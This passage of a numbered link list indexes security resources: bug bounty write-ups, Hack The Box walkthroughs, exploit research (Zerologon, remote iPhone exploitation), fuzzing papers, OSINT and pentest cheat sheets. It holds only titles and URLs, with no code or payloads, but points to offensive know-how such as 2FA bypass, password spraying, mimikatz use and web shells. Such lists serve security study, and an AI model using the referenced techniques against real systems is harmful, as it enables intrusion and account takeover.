Injection: Kind of SQL Injection in a NoSQL Database:\n\n\n\nhttps://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database/\n\n\n\n\n\n-2121-CSRF Protection Bypass in Play Framework:\n\n\nhttps://blog.doyensec.com/2020/08/20/playframework-csrf-bypass.html\n\n\n\n\n\n-2122-$25K Instagram Almost XSS Filter Link — Facebook Bug Bounty:\n\n\nhttps://medium.com/@alonnsoandres/25k-instagram-almost-xss-filter-link-facebook-bug-bounty-798b10c13b83\n\n\n-2123-techniques for learning passwords:\n\n\nhttps://rootkitpen.blogspot.com/2020/09/techniques-for-learning-passwords.html \n\n\n-2124-How a simple CSRF attack turned into a P1:\n\nhttps://ladysecspeare.wordpress.com/2020/04/05/how-a-simple-csrf-attack-turned-into-a-p1-level-bug/\n\n\n-2125-How I exploited the json csrf with method override technique:\n\n\nhttps://medium.com/@secureITmania/how-i-exploit-the-json-csrf-with-method-override-technique-71c0a9a7f3b0\n\n\n\n-2126-How I found CSRF(my first bounty):\n\n\nhttps://medium.com/@rajeshranjan457/how-i-csrfd-my-first-bounty-a62b593d3f4d\n\n\n-2127-Exploiting websocket application wide XSS and CSRF:\n\n\nhttps://medium.com/@osamaavvan/exploiting-websocket-application-wide-xss-csrf-66e9e2ac8dfa\n\n\n-2128-Touch ID authentication Bypass on evernote and dropbox iOS apps:\n\n\nhttps://medium.com/@pig.wig45/touch-id-authentication-bypass-on-evernote-and-dropbox-ios-apps-7985219767b2 \n\n\n\n-2129-Oauth authentication bypass on airbnb acquistion using wierd 1 char open redirect:\n\n\n\nhttps://xpoc.pro/oauth-authentication-bypass-on-airbnb-acquisition-using-weird-1-char-open-redirect/\n\n\n\n\n-2130-Two factor authentication bypass:\n\n\nhttps://gauravnarwani.com/two-factor-authentication-bypass/\n\n\n\n-2132-Tricky oracle SQLI situation:\n\n\nhttps://blog.yappare.com/2020/04/tricky-oracle-sql-injection-situation.html\n\n\n\n-2133-CORS bug on google’s 404 page (rewarded):\n\n\nhttps://medium.com/@jayateerthag/cors-bug-on-googles-404-page-rewarded-2163d58d3c8b\n\n\n\n\n-2134-Subdomain takeover via unsecured s3 bucket:\n\nhttps://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/\n\n\n\n-2135-Subdomain takeover via wufoo service:\n\n\nhttps://www.mohamedharon.com/2019/02/subdomain-takeover-via-wufoo-service-in.html\n\n\n\n\n-2136-How I found CSRF(my first bounty):\n\n\n\nhttps://medium.com/@rajeshranjan457/how-i-csrfd-my-first-bounty-a62b593d3f4d\n\n\n\n-2137-Race condition that could result to RCE a story with an app:\n\n\nhttps://medium.com/bugbountywriteup/race-condition-that-could-result-to-rce-a-story-with-an-app-that-temporary-stored-an-uploaded-9a4065368ba3\n\n\n-2138-Creating thinking is our everything : Race condition and business logic:\n\n\nhttps://medium.com/@04sabsas/bugbounty-writeup-creative-thinking-is-our-everything-race-condition-business-logic-error-2f3e82b9aa17\n\n\n-2139-Chaining improper authorization to Race condition to harvest credit card details:\n\n\nhttps://medium.com/@ciph3r7r0ll/chaining-improper-authorization-to-race-condition-to-harvest-credit-card-details-a-bug-bounty-effe6e0f5076\n\n\n\n-2140-Google APIs Clickjacking worth 1337$:\n\n\nhttps://medium.com/@godofdarkness.msf/google-apis-clickjacking-1337-7a3a9f3eb8df \n\n\n\n-2141-Bypass CSRF with clickjacking on Google org:\n\n\nhttps://medium.com/@saadahmedx/bypass-csrf-with-clickjacking-worth-1250-6c70cc263f40 \n\n\n\n-2142-2FA Bypass via logical rate limiting Bypass:\n\n\nhttps://medium.com/@jeppe.b.weikop/2fa-bypass-via-logical-rate-limiting-bypass-25ae2a4e1835\n\n\n\n-2143-OTP bruteforce account takeover:\n\n\n\nhttps://medium.com/@ranjitsinghnit/otp-bruteforce-account-takeover-faaac3d712a8\n\n\n\n\n-2144-Microsoft RCE bugbounty:\n\n\nhttps://blog.securitybreached.org/2020/03/31/microsoft-rce-bugbounty/\n\n\n\n-2145-Bug Bounty Tips #1:\n\n\n\nhttps://www.infosecmatter.com/bug-bounty-tips-1/\n\n\n\n-2146-Bug Bounty Tips #2:\n\n\nhttps://www.infosecmatter.com/bug-bounty-tips-2-jun-30/\n\n\n-2147-Bug Bounty Tips #3:\n\n\nhttps://www.infosecmatter.com/bug-bounty-tips-3-jul-21/\n\n\n-2148-Bug Bounty Tips #4:\n\n\nhttps://www.infosecmatter.com/bug-bounty-tips-4-aug-03/\n\n\n\n-2149-Bug Bounty Tips #5:\n\n\nhttps://www.infosecmatter.com/bug-bounty-tips-5-aug-17/\n\n\n\n-2150-Bug Bounty Tips #6:\n\n\nhttps://www.infosecmatter.com/bug-bounty-tips-6-sep-07/\n\n\n\n-2151-Finding Bugs in File Systems with an Extensible Fuzzing Framework ﴾TOS 2020﴿:\n\n\nhttps://wcventure.github.io/FuzzingPaper/Paper/TOS20_FileSys.pdf\n\n\n\n\n-2152-PeriScope: An Effective Probing and Fuzzing Framework for the Hardware‐OS Boundary ﴾NDSS2019﴿:\n\n\n\nhttps://wcventure.github.io/FuzzingPaper/Paper/NDSS19_PeriScope.pdf\n\n\n-2153-Bug Bounty Tips #7:\n\n\nhttps://www.infosecmatter.com/bug-bounty-tips-7-sep-27/\n\n\n\n-2154-Fuzzing: Hack, Art, and Science ﴾CACM 2020﴿:\n\n\n\nhttps://wcventure.github.io/FuzzingPaper/Paper/CACM20_Fuzzing.pdf\n\n\n\n-2155-Azure File Shares for Pentesters:\n\n\nhttps://blog.netspi.com/azure-file-shares-for-pentesters/\n\n\n\n-2156-XSS like a Pro:\n\n\n\nhttps://www.hackerinside.me/2019/12/xss-like-pro.html\n\n\n\n\n-2157-XSS on Cookie Pop-up Warning:\n\n\nhttps://vict0ni.me/bug-hunting-xss-on-cookie-popup-warning/\n\n\n\n-2158-Effortlessly finding Cross Site Script Inclusion (XSSI) & JSONP for bug bounty:\n\n\n\nhttps://medium.com/bugbountywriteup/effortlessly-finding-cross-site-script-inclusion-xssi-jsonp-for-bug-bounty-38ae0b9e5c8a\n\n\n-2159-XSS in Zoho Mail:\n\n\nhttps://www.hackerinside.me/2019/09/xss-in-zoho-mail.html\n\n\n\n\n-2160-Overview Of Empire 3.4 Features:\n\n\n\nhttps://www.bc-security.org/post/overview-of-empire-3-4-features/ \n\n\n\n-2161-Android App Source code Extraction and Bypassing Root and SSL Pinning checks:\n\n\nhttps://vj0shii.info/android-app-testing-initial-steps/\n\n\n\n-2162-The 3 Day Account Takeover:\n\n\nhttps://medium.com/@__mr_beast__/the-3-day-account-takeover-269b0075d526\n\n\n-2163-A Review of Fuzzing Tools and Methods:\n\n\nhttps://wcventure.github.io/FuzzingPaper/Paper/2017_review.pdf\n\n\n-2164-PeriScope: An Effective Probing and Fuzzing Framework for the Hardware‐OS Boundary ﴾NDSS2019﴿:\n\n\nhttps://wcventure.github.io/FuzzingPaper/Paper/NDSS19_PeriScope.pdf\n\n\n\n-2165-Oneplus XSS vulnerability in customer support portal:\n\n\nhttps://medium.com/@tech96bot/oneplus-xss-vulnerability-in-customer-support-portal-d5887a7367f4\n\n\n-2166-Windows-Privilege-Escalation-Resources:\n\n\nhttps://medium.com/@aswingovind/windows-privilege-escalation-resources-d35dca8444de\n\n\n-2167-Persistence – DLL Hijacking:\n\n\nhttps://pentestlab.blog/page/5/\n\n\n-2168-Scanning JS Files for Endpoints and Secrets:\n\n\nhttps://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/\n\n\n-2169-Password Spraying Secure Logon for F5 Networks:\n\n\nhttps://www.n00py.io/2020/08/password-spraying-secure-logon-for-f5-networks/\n\n\n\n-2170-Password Spraying Dell SonicWALL Virtual Office:\n\n\nhttps://www.n00py.io/2019/12/password-spraying-dell-sonicwall-virtual-office/\n\n\n\n-2171-Attention to Details : Finding Hidden IDORs:\n\n\nhttps://medium.com/@aseem.shrey/attention-to-details-a-curious-case-of-multiple-idors-5a4417ba8848\n\n\n\n\n-2172-Bypassing file upload filter by source code review in Bolt CMS:\n\n\n\nhttps://stazot.com/boltcms-file-upload-bypass/\n\n\n\n-2173-HTB{ Giddy }:\n\n\nhttps://epi052.gitlab.io/notes-to-self/blog/2019-02-09-hack-the-box-giddy/\n\n\n-2174-Analyzing WhatsApp Calls with Wireshark, radare2 and Frida:\n\n\nhttps://movaxbx.ru/2020/02/11/analyzing-whatsapp-calls-with-wireshark-radare2-and-frida/\n\n\n-2175-2FA bypass via CSRF attack:\n\n\nhttps://medium.com/@vbharad/2-fa-bypass-via-csrf-attack-8f2f6a6e3871\n\n\n-2176-CSRF token bypass [a tale of 2k bug]:\n\n\nhttps://medium.com/@sainttobs/csrf-token-bypasss-a-tale-of-my-2k-bug-ff7f51166ea1\n\n\n-2177-Setting the ‘Referer’ Header Using JavaScript:\n\n\nhttps://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/\n\n\n\n-2178-Bug Bytes #91 - The shortest domain, Weird Facebook authentication bypass & GitHub Actions secrets:\n\n\nhttps://blog.intigriti.com/2020/10/07/bug-bytes-91-the-shortest-domain-weird-facebook-authentication-bypass-github-actions-secrets/\n\n\n\n-2179-Stored XSS on Zendesk via Macro’s PART 2:\n\n\nhttps://medium.com/@hariharan21/stored-xss-on-zendesk-via-macros-part-2-676cefee4616\n\n\n-2180-Azure Account Hijacking using mimikatz’s lsadump::setntlm:\n\n\n\nhttps://www.trustedsec.com/blog/azure-account-hijacking-using-mimikatzs-lsadumpsetntlm/\n\n\n\n\n-2181-CORS misconfiguration account takeover out of scope to grab items in scope:\n\n\nhttps://medium.com/@mashoud1122/cors-misconfiguration-account-takeover-out-of-scope-to-grab-items-in-scope-66d9d18c7a46\n\n\n\n\n-2182-Razzer: Finding Kernel Race Bugs through Fuzzing ﴾S&P 2019﴿:\n\nhttps://wcventure.github.io/FuzzingPaper/Paper/SP19_Razzer.pdf\n\n\nhttps://lifeasageek.github.io/papers/jeong-razzer-slides.pdf\n\n\n\n-2183-Facebook Bug bounty : How I was able to enumerate\ninstagram accounts who had enabled 2FA:\n\n\nhttps://medium.com/@zk34911/facebook-bug-bounty-how-i-was-able-to-enumerate-instagram-accounts-who-had-enabled-2fa-two-step-fddba9e9741c\n\n\n-2184-Bypass hackerone 2FA:\n\n\nhttps://medium.com/japzdivino/bypass-hackerone-2fa-requirement-and-reporter-blacklist-46d7959f1ee5\n\n\n\n-2185-How I abused 2FA to maintain persistence after password recovery change google microsoft instragram:\n\n\n\nhttps://medium.com/@lukeberner/how-i-abused-2fa-to-maintain-persistence-after-a-password-change-google-microsoft-instagram-7e3f455b71a1\n\n\n\n-2186-How I hacked 40k user accounts of microsoft using 2FA bypass outlook:\n\n\n\nhttps://medium.com/@goyalvartul/how-i-hacked-40-000-user-accounts-of-microsoft-using-2fa-bypass-outlook-live-com-13258785ec2f\n\n\n\n\n-2187-How to bypass 2FA with a HTTP header:\n\n\nhttps://medium.com/@YumiSec/how-to-bypass-a-2fa-with-a-http-header-ce82f7927893\n\n\n\n-2188-Building a custom Mimikatz binary:\n\n\n\nhttps://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/\n\n\n-2189-Self XSS to Good XSS:\n\n\nhttps://medium.com/@arbazhussain/self-xss-to-good-xss-clickjacking-6db43b44777e\n\n\n-2190-DOM based XSS or why you should not rely on cloudflare too much:\n\n\nhttps://medium.com/bugbountywriteup/dom-based-xss-or-why-you-should-not-rely-on-cloudflare-too-much-a1aa9f0ead7d\n\n\n\n-2191-Reading internal files using SSRF vulnerability:\n\n\nhttps://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb\n\n\n-2192-Latest web hacking tools:\n\n\nhttps://portswigger.net/daily-swig/latest-web-hacking-tools-q3-2020\n\n\n\n-2193-Cross-Site Scripting (XSS) Cheat Sheet - 2020 Edition:\n\n\n\nhttps://portswigger.net/web-security/cross-site-scripting/cheat-sheet\n\n\n\n-2194-Hijacking a Domain Controller with Netlogon RPC (aka Zerologon: CVE-2020-1472):\n\n\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hijacking-a-domain-controller-with-netlogon-rpc-aka-zerologon-cve-2020-1472/\n\n\n\n-2195-How I got 1200+ Open S3 buckets…!:\n\n\nhttps://medium.com/@mail4frnd.mohit/how-i-got-1200-open-s3-buckets-aec347ea2a1e\n\n\n-2196-Open Sesame: Escalating Open Redirect to RCE with Electron Code Review:\n\n\nhttps://spaceraccoon.dev/open-sesame-escalating-open-redirect-to-rce-with-electron-code-review\n\n\n\n-2197-When you browse Instagram and find former Australian Prime Minister Tony Abbott's passport number:\n\n\nhttps://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram\n\n\n\n\n-2198-HTB{ Vault }:\n\n\nhttps://epi052.gitlab.io/notes-to-self/blog/2018-11-04-hack-the-box-vault/\n\n\n\n-2199-HTB{ ellingson }:\n\n\nhttps://epi052.gitlab.io/notes-to-self/blog/2019-09-29-hack-the-box-ellingson/\n\n\n\n-2200-HTB{ Swagshop }:\n\n\nhttps://epi052.gitlab.io/notes-to-self/blog/2019-09-12-hack-the-box-swagshop/\n\n\n\n-2201-Evading Firewalls with Tunnels:\n\n\nhttps://michiana-infosec.com/evading-firewalls-with-tunnels/\n\n\n\n-2202-How to Geolocate Mobile Phones (or not):\n\n\n\nhttps://keyfindings.blog/2020/07/12/how-to-geolocate-mobile-phones-or-not/\n\n\n\n-2203-Web application race conditions: It’s not just for binaries:\n\n\nhttps://blog.pucarasec.com/2020/07/06/web-application-race-conditions-its-not-just-for-binaries/\n\n\n\n\n\n\n\n-2204-Two-Factor Authentication Bypass:\n\n\nhttps://gauravnarwani.com/two-factor-authentication-bypass/\n\n\n\n-2205-Proxies, Pivots, and Tunnels – Oh My! :\n\n\nhttps://blog.secureideas.com/2020/10/proxies_pivots_tunnels.html\n\n\n-2206-Let's Debug Together: CVE-2020-9992:\n\n\nhttps://blog.zimperium.com/c0ntextomy-lets-debug-together-cve-2020-9992/\n\n\n\n-2207-I Like to Move It: Windows Lateral Movement Part 3: DLL Hijacking:\n\n\nhttps://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/\n\n\n-2208-Abusing Chrome's XSS auditor to steal tokens:\n\n\nhttps://portswigger.net/research/abusing-chromes-xss-auditor-to-steal-tokens\n\n\n\n-2209-ModSecurity, Regular Expressions and Disputed CVE-2020-15598:\n\n\n\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/modsecurity-regular-expressions-and-disputed-cve-2020-15598/\n\n\n\n\n\n\n-2210-Bug Bounty Tips #8:\n\n\nhttps://www.infosecmatter.com/bug-bounty-tips-8-oct-14/\n\n\n\n-2211-IOS Pentesing Guide From A N00bs Perspective:\n\n\n\nhttps://payatu.com/blog/abhilashnigam/ios-pentesing-guide-from-a-n00bs-perspective.1\n\n\n\n-2212-Bug Bytes #92 - Pwning Apple for three months, XSS in VueJS, Hacking Salesforce Lightning & Unicode byͥtes:\n\n\n\nhttps://blog.intigriti.com/2020/10/14/bug-bytes-92-pwning-apple-for-three-months-xss-in-vuejs-hacking-salesforce-lightning-unicode-by%cd%a5tes/\n\n\n\n-2213-We Hacked Apple for 3 Months: Here’s What We Found:\n\n\nhttps://samcurry.net/hacking-apple/\n\n\n-2214-Breaking JCaptcha using Tensorflow and AOCR:\n\n\nhttps://www.gremwell.com/breaking-jcaptcha-tensorflow-aocr\n\n\n\n\n\n-2215-Bug Bytes #82 - Timeless timing attacks, Grafana SSRF, Pizza & Youtube delicacie:\n\n\nhttps://blog.intigriti.com/2020/08/05/bug-bytes-82-timeless-timing-attacks-grafana-ssrf-pizza-youtube-delicacies/\n\n\n\n\n-2216-Bug Bytes #71 – 20K Facebook XSS, LevelUp 0x06 &Naffy’s Notes:\n\n\n\nhttps://blog.intigriti.com/2020/05/20/bug-bytes-71-20k-facebook-xss-levelup-0x06-naffys-notes/\n\n\n\n-2217-Bug Bytes #90 - The impossible XSS, Burp Pro tips & A millionaire on bug bounty and meditation:\n\n\n\nhttps://blog.intigriti.com/2020/09/30/bug-bytes-90-the-impossible-xss-burp-pro-tips-a-millionaire-on-bug-bounty-and-meditation/\n\n\n\n\n-2218-How to Find Vulnerabilities in Code: Bad Words:\n\n\nhttps://btlr.dev/blog/how-to-find-vulnerabilities-in-code-bad-words\n\n\n\n\n-2219-Testing for WebSockets security vulnerabilities:\n\n\nhttps://portswigger.net/web-security/websockets\n\n\n\n-2220-Practical Web Cache Poisoning:\n\n\n\nhttps://portswigger.net/research/practical-web-cache-poisoning\n\n\n\n\n-2221-htb{ zipper }:\n\n\nhttps://epi052.gitlab.io/notes-to-self/blog/2018-10-22-hack-the-box-zipper/\n\n\n-2222-What is HTTP request smuggling? Tutorial & Examples:\n\n\nhttps://portswigger.net/web-security/request-smuggling\n\n\n\n-2223-When alert fails: exploiting transient events:\n\n\n\nhttps://portswigger.net/research/when-alert-fails-exploiting-transient-events\n\n\n\n\n-2224-BugPoC LFI Challeng:\n\n\nhttps://hipotermia.pw/bb/bugpoc-lfi-challenge\n\n\n\n\n-2225-Misc CTF - Request Smuggling:\n\n\nhttps://hg8.sh/posts/misc-ctf/request-smuggling/\n\n\n\n\n-2226-403 to RCE in XAMPP:\n\n\nhttps://www.securifera.com/blog/2020/10/13/403-to-rce-in-xampp/\n\n\n-2227-Phone numbers investigation, the open source way:\n\n\nhttps://www.secjuice.com/phone-numbers-investigation-the-open-source-way/\n\n\n\n-2228-Covert Web Shells in .NET with Read-Only Web Paths:\n\n\n\nhttps://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/\n\n\n\n\n\n-2229-From Static Analysis to RCE:\n\n\nhttps://blog.dixitaditya.com/from-android-app-to-rce/\n\n\n\n-2230-GitHub Pages - Multiple RCEs via insecure Kramdown configuration - $25,000 Bounty:\n\n\n\nhttps://devcraft.io/2020/10/20/github-pages-multiple-rces-via-kramdown-config.html\n\n\n\n\n\n-2231-Signed Binary Proxy Execution via PyCharm:\n\n\n\n\nhttps://www.archcloudlabs.com/projects/signed_binary_proxy_execution/\n\n\n\n-2232-Bug Bytes #93 - Discord RCE, Vulnerable HTML to PDF converters & DOMPurify bypass demystified :\n\n\nhttps://blog.intigriti.com/2020/10/21/bug-bytes-93-discord-rce-vulnerable-html-to-pdf-converters-dompurify-bypass-demystified/\n\n\n\n\n-2233-Bug Bytes #94 - Breaking Symfony apps, Why Cyber Security is so hard to learn & how best to approach it:\n\n\n\nhttps://blog.intigriti.com/2020/10/28/bug-bytes-94-breaking-symfony-apps-why-cyber-security-is-so-hard-to-learn-how-best-to-approach-it/\n\n\n-2234-Advanced Level Resources For Web Application Penetration Testing:\n\n\nhttps://twelvesec.com/2020/10/19/advanced-level-resources-for-web-application-penetration-testing/\n\n\n\n-2235-Pass-the-hash wifi:\n\n\nhttps://sensepost.com/blog/2020/pass-the-hash-wifi/\n\n\n\n-2236-HTML to PDF converters, can I hack them?:\n\n\nhttps://sidechannel.tempestsi.com/html-to-pdf-converters-can-i-hack-them-a681cfee0903\n\n\n\n\n\n-2237-Android adb reverse tethering mitm setup:\n\n\nhttps://www.securify.nl/blog/android-adb-reverse-tethering-mitm-setup/\n\n\n\n\n-2238-Typical Wi-Fi attacks:\n\n\nhttps://splone.com/blog/2020/10/13/typical-wi-fi-attacks/\n\n\n\n\n-2239-Burp suite “ninja moves”:\n\n\nhttps://owasp.org/www-chapter-norway/assets/files/Burp%20suite%20ninja%20moves.pdf\n\n\n\n-2240-Razzer: Finding Kernel Race Bugs through Fuzzing ﴾S&P 2019﴿:\n\n\nPaper:https://wcventure.github.io/FuzzingPaper/Paper/SP19_Razzer.pdf\n\n\nCode:https://github.com/compsec-snu/razzer\n\n\nSlides:https://lifeasageek.github.io/papers/jeong-razzer-slides.pdf\n\n\n\n\n\n-2241-MoonShine: Optimizing OS Fuzzer Seed Selection with Trace Distillation ﴾USENIX Security2018﴿:\n\n\n\nPaper:https://wcventure.github.io/FuzzingPaper/Paper/USENIX18_MoonShine.pdf\n\n\n\n\n-2242-Sequence directed hybrid fuzzing ﴾SANER 2020﴿:\n\n\nPaper:https://wcventure.github.io/FuzzingPaper/Paper/SANER20_Sequence.pdf\n\n\n\n-2243-Open Source Intelligence Tools And Resources Handbook 2020:\n\n\nhttps://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf\n\n\n\n\n-2244-How to Find IP Addresses Owned by a Company:\n\n\nhttps://securitytrails.com/blog/identify-ip-ranges-company-owns\n\n\n\n\n-2245-What is Banner Grabbing? Best Tools and Techniques Explained:\n\n\nhttps://securitytrails.com/blog/banner-grabbing\n\n\n\n-2246-Recon Methods Part 4 – Automated OSINT:\n\n\n\nhttps://www.redsiege.com/blog/2020/04/recon-methods-part-4-automated-osint/\n\n\n\n\n\n-2247-Forcing Firefox to Execute XSS Payloads during 302 Redirects:\n\n\n\nhttps://www.gremwell.com/firefox-xss-302\n\n\n\n\n-2248-HTB{ Frolic }:\n\n\nhttps://epi052.gitlab.io/notes-to-self/blog/2018-10-22-hack-the-box-frolic/\n\n\n\n-2249-Identifying Vulnerabilities in SSL/TLS and Attacking them:\n\n\n\nhttps://medium.com/bugbountywriteup/identifying-vulnerabilities-in-ssl-tls-and-attacking-them-e7487877619a\n\n\n\n\n-2250-My First Bug Bounty Reward:\n\n\nhttps://medium.com/bugbountywriteup/my-first-bug-bounty-reward-8fd133788407\n\n\n\n-2251-2FA Bypass On Instagram Through A Vulnerable Endpoint:\n\n\nhttps://medium.com/bugbountywriteup/2fa-bypass-on-instagram-through-a-vulnerable-endpoint-b092498af178\n\n\n\n-2252-Automating XSS using Dalfox, GF and Waybackurls:\n\n\nhttps://medium.com/bugbountywriteup/automating-xss-using-dalfox-gf-and-waybackurls-bc6de16a5c75\n\n\n\n-2253-Think Outside the Scope: Advanced CORS Exploitation Techniques:\n\n\n\nhttps://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397\n\n\n\n\n\n-2254-Intro to CTFs. Resources, advice and everything else:\n\n\nhttps://medium.com/bugbountywriteup/intro-to-ctfs-164a03fb9e60\n\n\n\n\n\n\n-2255-PowerShell Commands for Pentesters:\n\n\nhttps://www.infosecmatter.com/powershell-commands-for-pentesters/\n\n\n\n-2256-31k$ SSRF in Google Cloud Monitoring led to metadata exposure:\n\n\nhttps://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html\n\n\n\n\n\n-2257-NAT Slipstreaming:\n\n\nhttps://samy.pl/slipstream/\n\n\n\n-2258-How i got 7000$ in Bug-Bounty for my Critical Finding:\n\n\nhttps://medium.com/@noobieboy1337/how-i-got-7000-in-bug-bounty-for-my-critical-finding-99326d2cc1ce\n\n\n\n\n\n-2259-SQL Injection Payload List:\n\n\nhttps://medium.com/@ismailtasdelen/sql-injection-payload-list-b97656cfd66b\n\n\n\n-2260-Taking over multiple user accounts:\n\n\n\nhttps://medium.com/bugbountywriteup/chaining-password-reset-link-poisoning-idor-account-information-leakage-to-achieve-account-bb5e0e400745\n\n\n\n-2261-Bug Bytes #98 - Imagemagick's comeback, Treasure trove of wordlists, Advent of Cyber & How to get more hours in your day:\n\n\nhttps://blog.intigriti.com/2020/11/25/bug-bytes-98-imagemagicks-comeback-treasure-trove-of-wordlists-advent-of-cyber-how-to-get-more-hours-in-your-day/\n\n\n\n-2262-How to get root on Ubuntu 20.04 by pretending nobody’s /home:\n\n\nhttps://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE\n\n\n-2263-What is Shodan? Diving into the Google of IoT Devices:\n\n\nhttps://securitytrails.com/blog/what-is-shodan\n\n\n\n-2264-Purgalicious VBA: Macro Obfuscation With VBA Purging & OfficePurge:\n\n\nhttps://www.fireeye.com/blog/threat-research/2020/11/purgalicious-vba-macro-obfuscation-with-vba-purging.html\n\n\nhttps://github.com/fireeye/OfficePurge\n\n\n\n-2265-Dynamic Invocation in .NET to bypass hooks:\n\n\nhttps://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/\n\n\n\n-2266-NepHack Online CTF June 2020 Write-up:\n\n\n\nhttps://www.askbuddie.com/blog/nephack-online-ctf-june-2020-write-up/\n\n\n\n-2268-Attacking SCADA Part II::\n\n\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacking-scada-part-ii-vulnerabilities-in-schneider-electric-ecostruxure-machine-expert-and-m221-plc/\n\n\n\n\n-2269-PENTESTING CHEATSHEET:\n\n\nhttps://hausec.com/pentesting-cheatsheet\n\n\n-2270-CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability:\n\n\nhttp://blog.pi3.com.pl/?p=780\n\n\n\n\n\n-2271-TShark Cheatsheet:\n\n\n\nhttps://snippets.bentasker.co.uk/page-1909131238-TShark-Cheatsheet-BASH.html\n\n\n\n-2272-Exploiting a “Simple” Vulnerability – In 35 Easy Steps or Less!:\n\n\nhttps://windows-internals.com/exploiting-a-simple-vulnerability-in-35-easy-steps-or-less/\n\n\n\n-2273-Exploiting CVE-2020-0041 - Part 1: Escaping the Chrome Sandbox:\n\n\nhttps://labs.bluefrostsecurity.de/blog/2020/03/31/cve-2020-0041-part-1-sandbox-escape/\n\n\n\n-2274-Exploiting CVE-2020-0041 - Part 2: Escalating to root:\n\n\n\nhttps://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/\n\n\n\n-2275-Exploiting MS16-145: MS Edge TypedArray.sort Use-After-Free (CVE-2016-7288):\n\n\nhttps://blog.quarkslab.com/exploiting-ms16-145-ms-edge-typedarraysort-use-after-free-cve-2016-7288.html\n\n\n-2276-Bug Bytes #99 – Bypassing bots and WAFs,JQ in Burp & Smarter JSON fuzzing and subdomain takeovers:\n\n\nhttps://blog.intigriti.com/2020/12/02/bug-bytes-99-bypassing-bots-and-wafs-jq-in-burp-smarter-json-fuzzing-and-subdomain-takeovers/\n\n\n\n-2277-Digging secrets from git repositories by using truffleHog:\n\n\nhttps://redblueteam.wordpress.com/2020/01/04/digging-secrets-from-git-repositories-by-using-trufflehog\n\n\n\n\n\n-2287-Apple Safari Pwn2Own 2018 Whitepaper:\n\n\nhttps://labs.f-secure.com/assets/BlogFiles/apple-safari-pwn2own-vuln-write-up-2018-10-29-final.pdf\n\n\n\n\n-2288-DISSECTING APT21 SAMPLES USING A STEP-BY-STEP APPROACH:\n\n\nhttps://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/\n\n\n\n\n-2289-MITRE ATT&CK T1082 System Information Discovery:\n\n\nhttps://www.picussecurity.com/resource/attck-t1082-system-information-discovery\n\n\n\n\n\n-2290-A simple and fast Wireshark tutorial:\n\n\n\nhttps://andregodinho1.medium.com/a-simple-and-fast-wireshark-tutorial-7d2b78a71820\n\n\n\n\n\n-2291-Recon - My Way Or High Way:\n\n\nhttps://shahjerry33.medium.com/recon-my-way-or-high-way-58a18dab5c95 \n\n\n\n\n\n-2292-Finding bugs at limited scope programs (Single Domain Websites):\n\n\n\nhttps://dewcode.medium.com/finding-bugs-at-limited-scopes-programs-single-domain-websites-d3c2ff396edf\n\n\n\n\n-2293-Passive intelligence gathering techniques:\n\n\nhttps://medium.com/@agent_maximus/passive-intelligence-gathering-techniques-uncover-domains-subdomains-ip-addresses-a40f51ee0eb0 \n\n\n\n\n\n\n\n-2294-Android Pen-testing/Hunting 101:\n\n\nhttps://medium.com/@noobieboy1337/android-pen-testing-hunting-101-dc0fecf90682 \n\n\n\n\n-2295-All MITM attacks in one place:\n\n\n\nhttps://github.com/Sab0tag3d/MITM-cheatsheet\n\n\n\n\n-2296-From Recon to Optimizing RCE Results:\n\n\nhttps://medium.com/bugbountywriteup/from-recon-to-optimizing-rce-results-simple-story-with-one-of-the-biggest-ict-company-in-the-ea710bca487a \n\n\n\n-2297-RCE on https://beta-partners.tesla.com due to CVE-2020-0618:\n\n\n\nhttps://bugcrowd.com/disclosures/d23e05b1-c4cc-440a-a678-d8045468c902/rce-on-https-beta-partners-tesla-com-due-to-cve-2020-0618\n\n\n\n\n-2298-Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641:\n\n\n\nhttps://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-1.html\n\n\n\n-2299-Remote iPhone Exploitation Part 2: Bringing Light into the Darkness -- a Remote ASLR Bypass:\n\n\nhttps://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-2.html\n\n\n\n\n-2300-Remote iPhone Exploitation Part 3: From Memory Corruption to JavaScript and Back -- Gaining Code Execution:\n\n\nhttps://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-3.html\n\n\n\n\n\n-2301-1000$ for Open redirect via unknown technique [BugBounty writeup]:\n\n\nhttps://ruvlol.medium.com/1000-for-open-redirect-via-unknown-technique-675f5815e38a\n\n\n\n\n-2302-Facebook SSRF:\n\n\nhttps://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5\n\n\n\n-2303-Metasploit Tips and Tricks for HaXmas 2020:\n\n\nhttps://blog.rapid7.com/2020/12/23/metasploit-tips-and-tricks-for-haxmas-2020-2/\n\n\n\n\n-2304-SubDomain TakeOver ~ Easy WIN WIN:\n\n\nhttps://amitp200.medium.com/subdomain-takeover-easy-win-win-6034bb4147f3 \n\n\n\n\n\n-2305-Recon Methodology :\n\n\nhttps://github.com/Quikko/Recon-Methodology \n\n\n-2306-h1-212 CTF Writeup:\n\n\nhttps://gist.github.com/Corb3nik/aeb7c762bd4fec36436a0b5686651e69 